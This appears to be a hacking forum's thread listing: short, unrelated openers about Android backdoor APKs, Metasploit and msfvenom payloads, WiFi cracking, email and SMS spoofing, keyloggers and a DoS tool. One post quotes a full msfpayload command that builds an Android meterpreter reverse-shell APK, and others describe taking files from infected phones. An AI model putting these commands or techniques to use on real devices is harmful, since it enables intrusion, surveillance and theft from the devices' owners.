Hi My Fellow H4CK3Rs Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". The following Methods work 100%. So, Follow the steps carefully. But before getting started, if you are a beginner, then read the following Answers first...
Hello my fellow hacker im new around here. My name is thegeniesghost a relatively new arouund here,
After reading OTW's article on Wifiphisher i wanted to increase my txpower however unsuccessfully. I tried the tutorial on the Evil Twin AP but that didn't work for me either I looked at other tutorials but they suggested a similar or identical method. My adapter is a Tp-link TL-WN722N, so if anyone has experience with this it will be much appreciated. Thank you :)
for example i made a PAYLOAD
hello guys i have a problem and i couldn't find answer in ANY site !
Hi My Fellow H4ck3Rs! In this Thread, I`m gonna show you how to install Metasploit Framework in TermuX. You can use it for Android to Android/Windows hacking. It is the best way to hack another android like WATCH_DOGS Style :)
Hello guys, I'm new to hacking and I'm learning the Reconnaissance phase. I'm also completely new to Networking... but I'm always thinking how anonymize all my techniques. I would like to ask which are the most anonymous active recon technique you guys are applying today.
Hello, i recently buy Tp-Link wn8200nd adapter and i wonder how can i make it work with my kali linux?
Hi my fellow hackers! Today I will teach you how hashes are made and how you can identify and crack them.
Hi there! I'm Joash Jeshurun & this is my first writing on this website. Today, in this post I'll reveal how hackers try to gain access into Android devices and cause disastrous effects.
Hello! So. Today i woke up and opened my VM. Then i got a notification saying something like "Could not connect to network"
Hello, fellow hackers! Today I am going to show you just how easy it is to spoof E-Mails and impersonate any E-Mail address. Because of how easy it is to do, anyone with five minutes of free time can send malicious E-Mails to you while pretending to be your boss, teacher, SO, etc. You can probably guess how devastating the consequences of such an attack can be.
Hello There, i recently had some questions about hacking
I've seen this in a lot of threads, I know that they set the Local and Remote host, but what would happen if you didn't set them up?
I know quiet well linux and decide to start with kali linux few weeks ago. So i installed it on my usb key and boot in persistence mode with it. Everything worked as i was expecting, wifi connection... But i wanted to try aircrack-ng so i began with scaning networks but it doesn't seems to work :
Hello There, i recently had some questions about hacking
Sup, my fellow white hat hackers! In this tutorial, I will show you an AWESOME script for key logging.
After playing around with the Linux Distribution"Kali Linux" for a while, I learned about the payload called "meterpreter," which basically allows you to connect to someones computer remotely if the backdoor is installed on a victims PC. To create the backdoor, I used a program called "Veil Evasion." After learning how to use Veil-Evasion, I quickly compiled a backdoor. Photo of Veil below. Anyways... I compiled the backdoor to an EXE and moved it to my Windows 7 desktop (I am using a Virtual...
Hello, I've recently downloaded Kali to try to learn some new cool stuff. I came across the TheFatRat program on the net and I've downloaded it and generated a backdoor apk(tried both msfvenom and original apk-s)
I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:
Hi...I am a newbie. Last night i was playing with wifite. And tergated my own network for attack along with another network. And as expected wifi dis connected. Then i exit and shut down my laptop.
so I wanna hack a wps locked wifi, is their any program like bully/reaver that can do it?? keep getting AP warning with those.
Hello everyone! I thought I'd help a few people out by writing a written tutorial on how to install Kali Linux on your chromebook, as well as Metasploit-Framework, so let's begin! If you would like a video version instead, watch my YouTube video at the bottom of the page. Although this guide is a lot more clear.
I Had a Program Installed on My Computer to Block the Internet, Now I Am Trying to Uninstall It but It Asks for a Password to Uninstall.
I installed kali Linux on my desktop selecting gdm3 and it worked perfect after the installation. However after I have updated and upgraded, I restarted my pc and it gets stuck with a queue of lines ending with "started gnome display manager". After I press Alt + F2 I can login using my details. I tried hitting sudo service gdm3 start. It did work once but now it's not anymore. I tried installing over and over again. Everytime I am stuck here. Please kindly help me out.
I'll start with a disclaimer: this phone is, following the laws in my country, legally in my possession. I'll share some anonymous background information, but that is not the subject of this post. The phone came into my possession after my brother abruptly passed away (him being the previous rightful owner and not having a partner or children). Because of how he passed away I am not capable of gaining access to the phone; however, also because of how he passed away, me and the family really w...
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to hel
Unicorn Framework is an iOS, macOS and Linux post-exploitation framework that using one line command and powerful python payload attempts to spawn a command line session with a lot of features such as downloading files, uploading files, getting system information and etc.
I'm trying to use Alfa awus1900 for WiFi hacking bit it doesn't does the job and after turning on monitor mode the still shows as wlan0 in both the modes in monitorias well as manager mode so do some kindly help me with the homework
When i use an exploit, i receive an error... Here is printscreen with the error: http://postimg.org/image/fd7zq8ubl/
I know SET used to have sms spoofing but it has since been removed. How would I do it now?
Forum Thread: How Does Someone Attack Account by Just Having Their @Username ? The Application Is Kik!
some dude was asking for my kik username! and someone provide it to him and now i can't even connect or see the messages! is it ddos attack?
I currently have Kali 1.1.0a and I really want to use the sms spoofer on SET but its only available on the old versions of SET. So how could I replace my version of SET with the version of SET that has the sms spoofer? Thanks!
So I know that i can use proxy chain the host side of the reverse_tcp connection but the victim pc connects to my public ip so someone can easily check who is doing the attack. Can I somehow add proxychain to the msfvenom payload
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
I've been trying to hack my own pcs and android.. I was able to hack my pc using online videos and converting exe to jpg. But i can't apply that method for android. I hacked my own phone through a payload apk, but i need the payload in an image. Can anyone help me out?
Hello everyone! I need some help regarding stdapifsstat: Operation failed: 1 this issue. I have created an infected apk file using Evil-Droid and have successfully created a session over LAN with my android device. Every command is working perfectly. But I want to download pictures from DCIM folder to my root directory.
Hello guys, My adapter name in linux ipconfig command shows wlan0.
we have all heard about the hulk tool for dosing sites but time has passed and it went hold, now it barely can hold any sites off with CDNs and Loadbalancing servers like nginx and cloudflare protecting them. well not any more, witness the power of the new and improved hulk tool version 1.0.2, available in both golang and python.